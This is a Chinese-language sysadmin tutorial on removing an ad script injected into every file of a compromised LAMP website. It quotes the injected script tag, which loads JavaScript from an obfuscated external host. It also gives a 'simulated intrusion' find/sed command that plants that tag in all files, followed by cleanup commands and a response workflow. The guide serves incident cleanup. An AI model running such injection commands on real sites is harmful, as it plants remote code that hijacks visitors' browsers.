案例:某公司一個lamp的伺服器網站站點目錄下所有文件均被植入了廣告腳本如下內容: <script language=javascriptsrc=http://%4%66E%78%72%67%2E%70%6F/x.js?google_ad=93x28_ad> </script>' 包括圖片文件也為植 ...
案例:某公司一個lamp的伺服器網站站點目錄下所有文件均被植入了廣告腳本如下內容:
<script language=javascriptsrc=http://%4%66E%78%72%67%2E%70%6F/x.js?google_ad=93x28_ad>
</script>'
包括圖片文件也為植入了,網站打開時就會調用這個地址,顯示一個廣告,造成的用戶體驗很惡劣,那麼如何快速處理呢。
解決方法:思路是:需要查看所有目錄所有文件,把以上被植入的內容刪除掉。
測試數據如下:
入侵模擬植入命令:
find ./ -type f|xargs sed -i '1 i <script language=javascript
src=http://%4%66E%78%72%67%2E%70%6F/x.js?google_ad=93x28_ad></script>'
解決方法:
1、 正則方法:
find ./ -type f -exec sed -i '/^.*google_ad.*$/d' {} \;
註意:本方法容易把程式了i的其他正常內容給刪掉了,匹配關鍵字很重要,因此不建議使用此方法。
2、 完整去除,擺脫正則匹配的麻煩:
find ./ -type f|xargs sed -i '/<script language=javascript src=htt
p:\/\/%4%66E%78%72%67%2E%70%6F\/x.js?google_ad=93x28_ad><\/script>/d'
find ./ -type f|xargs sed -i 's#<script language=javascript src=ht
tp://%4%66E%78%72%67%2E%70%6F/x.js?google_ad=93x28_ad></script>##g'
從發現問題到解決流程:
1、 運營人員、網站用戶發現問題,網站有彈窗廣告。
2、 運營人員報給開發人員,開發人員聯繫運維人員,開發和運維共同解決。
3、 開發發現的問題原因就是所有站點目錄被植入一段js代碼。
4、 運維人員解決問題:a.備份原始出問題的原始文件。b.歷史備份覆蓋。c.find+sed替換。
5、 詳細查看日誌,查找問題發生來源並修補漏洞。
